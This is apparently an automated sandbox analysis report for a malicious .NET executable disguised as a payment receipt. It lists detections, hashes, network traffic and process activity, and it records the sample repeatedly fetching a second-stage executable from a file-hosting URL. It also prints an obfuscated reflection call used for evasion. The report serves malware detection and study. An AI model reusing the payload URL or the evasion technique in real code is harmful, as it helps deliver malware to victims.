Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAYMENT_RECEIPT_STAN100699.exe

Overview

General Information

Sample Name:PAYMENT_RECEIPT_STAN100699.exe
Analysis ID:1335249
MD5:488cd0c21974d76054d33936d477e0cd
SHA1:3b9a70a4aaf40b1bada8c337801e35762f9207d2
SHA256:6049ebd2d0d4238690c57ad4928ad638d26f1b19de398820e12e3bc86f874db0
Tags:exe
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Initial sample is a PE file and has a suspicious name
.NET source code contains method to dynamically call methods (often used by packers)
Sample has a suspicious name (potential lure to open the executable)
Machine Learning detection for sample
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Binary contains a suspicious time stamp
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
PE / OLE file has an invalid certificate
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • SkypeApp.exe (PID: 5076 cmdline: "C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca MD5: 7F4A25126DC7ABB0A94B1BC62587AF37)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PAYMENT_RECEIPT_STAN100699.exeAvira: detected
Source: PAYMENT_RECEIPT_STAN100699.exeReversingLabs: Detection: 47%
Source: PAYMENT_RECEIPT_STAN100699.exeVirustotal: Detection: 64%Perma Link
Source: PAYMENT_RECEIPT_STAN100699.exeJoe Sandbox ML: detected
Source: PAYMENT_RECEIPT_STAN100699.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49704 version: TLS 1.0
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49712 version: TLS 1.0
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49725 version: TLS 1.0
Source: PAYMENT_RECEIPT_STAN100699.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: NHhH77.pdb source: PAYMENT_RECEIPT_STAN100699.exe
Source: Binary string: NHhH77.pdbX source: PAYMENT_RECEIPT_STAN100699.exe
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: Joe Sandbox ViewIP Address: 5.253.86.15 5.253.86.15
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49704 version: TLS 1.0
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49712 version: TLS 1.0
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49725 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:33:47 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:33:54 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:34:19 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:34:28 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:34:35 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:34:41 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:34:51 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:34:58 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:35:11 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:35:24 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:35:40 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:35:59 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:36:20 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:36:27 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://ocsp.digicert.com0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000310C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.00000000031C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.at
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000310C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.00000000031C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.atd
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://s.symcd.com06
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: https://d.symcb.com/rpa0.
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000326B000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003164000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003129000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003273000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000326F000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003180000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003178000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003174000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000316C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000317C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000312D000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003125000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003170000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003168000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000318C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003188000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003184000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/somenonymous/OshiUpload
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003273000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000312D000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000318C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/qEWc/Y.exe
Source: PAYMENT_RECEIPT_STAN100699.exeString found in binary or memory: https://oshi.at/qEWc/Y.exeG/C
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003273000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000312D000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/qEWc/Y.exed
Source: unknownDNS traffic detected: queries for: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at

System Summary

barindex
Source: initial sampleStatic PE information: Filename: PAYMENT_RECEIPT_STAN100699.exe
Source: PAYMENT_RECEIPT_STAN100699.exeStatic file information: Suspicious name
Source: PAYMENT_RECEIPT_STAN100699.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000000.1251415536.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNHhH77.exe. vs PAYMENT_RECEIPT_STAN100699.exe
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3108402552.000000000114E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PAYMENT_RECEIPT_STAN100699.exe
Source: PAYMENT_RECEIPT_STAN100699.exeBinary or memory string: OriginalFilenameNHhH77.exe. vs PAYMENT_RECEIPT_STAN100699.exe
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeSection loaded: icuuc.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeSection loaded: icuin.dllJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeCode function: 0_2_02EF0DE80_2_02EF0DE8
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeCode function: 0_2_02EF0A600_2_02EF0A60
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeCode function: 0_2_02EF0A580_2_02EF0A58
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeCode function: 0_2_02EF0DD90_2_02EF0DD9
Source: PAYMENT_RECEIPT_STAN100699.exeStatic PE information: invalid certificate
Source: PAYMENT_RECEIPT_STAN100699.exeReversingLabs: Detection: 47%
Source: PAYMENT_RECEIPT_STAN100699.exeVirustotal: Detection: 64%
Source: PAYMENT_RECEIPT_STAN100699.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PAYMENT_RECEIPT_STAN100699.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe "C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
Source: classification engineClassification label: mal72.evad.winEXE@2/0@1/1
Source: PAYMENT_RECEIPT_STAN100699.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PAYMENT_RECEIPT_STAN100699.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: PAYMENT_RECEIPT_STAN100699.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: NHhH77.pdb source: PAYMENT_RECEIPT_STAN100699.exe
Source: Binary string: NHhH77.pdbX source: PAYMENT_RECEIPT_STAN100699.exe

Data Obfuscation

barindex
Source: PAYMENT_RECEIPT_STAN100699.exe, vIyyk4R14kq3TZsILi.cs.Net Code: ww3HVAylFCI6ImBHiK(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{ww3HVAylFCI6ImBHiK(typeof(IntPtr).TypeHandle),ww3HVAylFCI6ImBHiK(typeof(Type).TypeHandle)})
Source: PAYMENT_RECEIPT_STAN100699.exeStatic PE information: 0xC000A530 [Fri Jan 29 04:36:00 2072 UTC]
Source: PAYMENT_RECEIPT_STAN100699.exe, vIyyk4R14kq3TZsILi.csHigh entropy of concatenated method names: 'KfGbaWtKpNcjrQkK8F0', 'BmAwC0t7OsE6fSFarGR', 'CAgabU4VwS', 'j6FHWit1y5jILIN43w7', 'yomYGwtiJrWq6IirS7S', 'kacRuYtG9xn4ndyXNbL', 'G2yo9WtYPOfvm0wZ31h', 'JrAOV0t5gtsGemwrrT3', 'bfhlO9t3VhLgkfmvXh1', 'mNijOOtsDdXTs4T2KUy'
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
